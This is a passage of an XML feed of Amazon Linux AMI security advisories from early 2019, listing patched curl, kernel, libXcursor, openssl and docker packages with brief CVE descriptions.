epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.13" release="1.7.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.13" 
release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72" 
version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-mbstring" 
version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.13" release="1.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-opcache-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.13-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1148</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1148: low priority package update for curl</title><issued date="2019-01-21 23:46:00" /><updated date="2019-01-25 03:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16842:
Curl versions 7.14.1 through 7.61.1 are vulnerable to a heap-based buffer over-read in the tool_msgs.c:voutf() function that may result in information exposure and denial of service.
1644124:
CVE-2018-16842 curl: Heap-based buffer over-read in the curl tool warning formatting
CVE-2018-16840:
A heap use-after-free flaw was found in curl versions from 7.59.0 through 7.61.1 in the code related to closing an easy handle. When closing and cleaning up an &#039;easy&#039; handle in the `Curl_close()` function, the library code first frees a struct (without nulling the pointer) and might then subsequently erroneously write to a struct field within that already freed struct.
1642203:
CVE-2018-16840 curl: Use-after-free when closing "easy" handle in Curl_close()
CVE-2018-16839:
Curl versions 7.33.0 through 7.61.1 are vulnerable to a buffer overrun in the SASL authentication code that may lead to denial of service.
1642201:
CVE-2018-16839 curl: Integer overflow leading to heap-based buffer overflow in Curl_sasl_create_plain_message()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16839" title="" id="CVE-2018-16839" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16840" title="" id="CVE-2018-16840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16842" title="" id="CVE-2018-16842" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.53.1" release="16.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-16.86.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-16.86.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.53.1" release="16.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-16.86.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-16.86.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.86.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-16.86.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.86.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-16.86.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="16.86.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-16.86.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.86.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-16.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2019-1149</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1149: important priority package update for kernel</title><issued date="2019-01-25 02:26:00" /><updated date="2019-01-25 02:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16884:
A flaw was found in the Linux kernel&#039;s NFS41+ subsystem. NFS41+ shares mounted in different network namespaces at the same time can make bc_svc_process() use wrong back-channel IDs and cause a use-after-free vulnerability. Thus a malicious container user can cause a host kernel memory corruption and a system panic. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.
1660375:
CVE-2018-16884 kernel: nfs: use-after-free in svc_process_common()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16884" title="" id="CVE-2018-16884" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.94" release="73.73.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.94-73.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2019-1150</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1150: low priority package update for libXcursor</title><issued date="2019-02-07 04:22:00" /><updated date="2019-02-08 06:23:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-9262:
_XcursorThemeInherits in library.c in libXcursor before 1.1.15 allows remote attackers to cause denial of service or potentially code execution via a one-byte heap overflow.
1611599:
CVE-2015-9262 libxcursor: 1-byte heap-based overflow in _XcursorThemeInherits function in library.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9262" title="" id="CVE-2015-9262" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXcursor-debuginfo" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-debuginfo-1.1.14-2.1.10.amzn1.x86_64.rpm</filename></package><package name="libXcursor-devel" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-devel-1.1.14-2.1.10.amzn1.x86_64.rpm</filename></package><package name="libXcursor" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-1.1.14-2.1.10.amzn1.x86_64.rpm</filename></package><package name="libXcursor-devel" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-devel-1.1.14-2.1.10.amzn1.i686.rpm</filename></package><package name="libXcursor" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-1.1.14-2.1.10.amzn1.i686.rpm</filename></package><package name="libXcursor-debuginfo" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-debuginfo-1.1.14-2.1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1151</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1151: medium priority package update for curl</title><issued date="2019-02-07 04:24:00" /><updated date="2019-02-08 06:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20483:
set_file_metadata in xattr.c in GNU Wget before 1.20.1 stores a file&#039;s origin URL in the user.xdg.origin.url metadata attribute of the extended attributes of the downloaded file, which allows local users to obtain sensitive information (e.g., credentials contained in the URL) by reading this attribute, as demonstrated by getfattr. This also applies to Referer information in the user.xdg.referrer.url metadata attribute. According to 2016-07-22 in the Wget ChangeLog, user.xdg.origin.url was partially based on the behavior of fwrite_xattr in tool_xattr.c in curl.
1662705:
CVE-2018-20483 wget: Information exposure in set_file_metadata function in xattr.c
CVE-2018-0500:
A heap-based buffer overflow has been found in the Curl_smtp_escape_eob() function of curl. An attacker could exploit this by convincing a user to use curl to upload data over SMTP with a reduced buffer to cause a crash or corrupt memory.
1597101:
CVE-2018-0500 curl: Heap-based buffer overflow in Curl_smtp_escape_eob() when uploading data over SMTP
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0500" title="" id="CVE-2018-0500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20483" title="" id="CVE-2018-20483" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.61.1" release="7.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-7.91.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="7.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-7.91.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="7.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-7.91.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="7.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-7.91.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="7.91.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-7.91.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="7.91.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-7.91.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="7.91.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-7.91.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="7.91.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-7.91.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1153</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1153: low priority package update for openssl</title><issued date="2019-03-21 18:40:00" /><updated 
date="2019-03-25 23:11:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0734:
The OpenSSL DSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.1a (Affected 1.1.1). Fixed in OpenSSL 1.1.0j (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.0.2q (Affected 1.0.2-1.0.2p).
1644364:
CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0734" title="" id="CVE-2018-0734" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.148.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.148.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.148.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.148.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.148.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-1.0.2k-16.148.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1156</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1156: important priority package update for docker</title><issued date="2019-02-08 22:28:00" /><updated date="2019-02-11 16:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5736:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5736" title="" id="CVE-2019-5736" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker-debuginfo" version="18.06.1ce" release="7.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-18.06.1ce-7.25.amzn1.x86_64.rpm</filename></package><package name="docker" version="18.06.1ce" release="7.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-18.06.1ce-7.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1165</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1165: important priority package update for kernel</title><issued date="2019-02-26 18:55:00" /><updated date="2019-03-04 23:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-7222:
An information leakage issue was found in the way Linux kernel&#039;s KVM hypervisor handled page fault exceptions while emulating instructions like VMXON, VMCLEAR, VMPTRLD, and VMWRITE with memory address as an operand. It occurs if the operand is a mmio address, as the returned exception object holds uninitialized stack memory contents. A guest user/process could use this flaw to leak host&#039;s stack memory contents to a guest.
1671930:
CVE-2019-7222 Kernel: KVM: leak of uninitialized stack contents to guest
CVE-2019-7221:
A use-after-free vulnerability was found in the way the Linux kernel&#039;s KVM hypervisor emulates a preemption timer for L2 guests when nested (=1) virtualization is enabled. This high-resolution timer (hrtimer) runs when an L2 guest is active. After VM exit, the sync_vmcs12() timer object is stopped. The use-after-free occurs if the timer object is freed before calling the sync_vmcs12() routine. A guest user/process could use this flaw to crash the host kernel, resulting in a denial of service or, potentially, gain privileged access to a system.
1671904:
CVE-2019-7221 Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the preemption timer
CVE-2019-6974:
A use-after-free vulnerability was found in the way the Linux kernel&#039;s KVM hypervisor implements its device control API. While creating a device via kvm_ioctl_create_device(), the device holds a reference to a VM object; later this reference is transferred to the caller&#039;s file descriptor table. If such a file descriptor were closed, the reference count on the VM object could become zero, potentially leading to a use-after-free issue. A user/process could use this flaw to crash the guest VM, resulting in a denial of service issue or, potentially, gain privileged access to a system.
1671913:
CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6974" title="" id="CVE-2019-6974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7221" title="" id="CVE-2019-7221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7222" title="" id="CVE-2019-7222" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.101" 
